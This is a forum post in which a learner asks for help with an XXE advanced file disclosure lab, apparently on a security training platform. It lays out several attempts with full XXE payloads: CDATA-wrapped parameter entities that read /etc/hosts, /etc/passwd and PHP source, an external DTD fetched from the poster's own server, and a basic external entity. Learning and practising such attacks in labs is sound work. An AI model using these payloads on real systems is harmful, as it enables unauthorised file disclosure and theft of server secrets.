Hello fam,
I am now having a problem in XXE Advanced File Disclosure!
The Lab Question: Use either method from this section to read the flag at ‘/flag.php’. (You may use the CDATA method at ‘/index.php’, or the error-based method at ‘/error’).
My Approach: So I tried CDATA Method as Follow -
I first make an xxe.dtd file with the contents <!ENTITY joined "%begin;%file;%end;">
in my host, after that start my webserver!
I go to the target ip website and start intercepting with burp. As expected, the request go through '/submitDetails.php'
with POST
Method. So I tried to alter the XML data to perform an XXE attack.
Attampt 1
I include the data,
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:///etc/hosts"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
.
.
.
<email>&joined;</email>
which works as expected.
Sorry Had to delete the screenshot, as they don’t permit me as new user.
Attampt 2
So I tried for the core feature of CDATA, to get the source php code of submitDetails.php
with the following payload.
<!DOCTYPE email [
<!ENTITY % begin "<![CDATA["> <!-- prepend the beginning of the CDATA tag -->
<!ENTITY % file SYSTEM "file:////var/www/html/submitDetails.php"> <!-- reference external file -->
<!ENTITY % end "]]>"> <!-- append the end of the CDATA tag -->
<!ENTITY % xxe SYSTEM "http://10.10.14.204:8000/xxe.dtd"> <!-- reference our external DTD -->
%xxe;
]>
.
.
.
<email>&joined;</email>
But this doen’t output anything as we expected.
Sorry Had to delete the screenshot, as they don’t permit me as new user.
Attempt 3
So I tried to check another one, this time another system file, which is /etc/passwd
. Superisingly, this doesn’t work either [not like /etc/hosts
which worked.].
Attempt 4
OK, I thought may be they limit the file permission or output limit, so I tried basic XXE like following.
<!DOCTYPE foo [<!ENTITY example SYSTEM "/etc/passwd"> ]>
.
.
.
<email>&example;</email>
But guess what, this work.
Sorry Had to delete the screenshot, as they don’t permit me as new user.
Attempt 5
I have tried things that I know, but none didn’t work.
Bonus: So I tried to see what the question /flag.php
looks like, but it returns a 404 Error, not a 302 or 500.
So I came here to ask for help. May be some glitch in the lab setup? or I am missing some important thing?
Thanks alot. Please Help me solve this puzzle.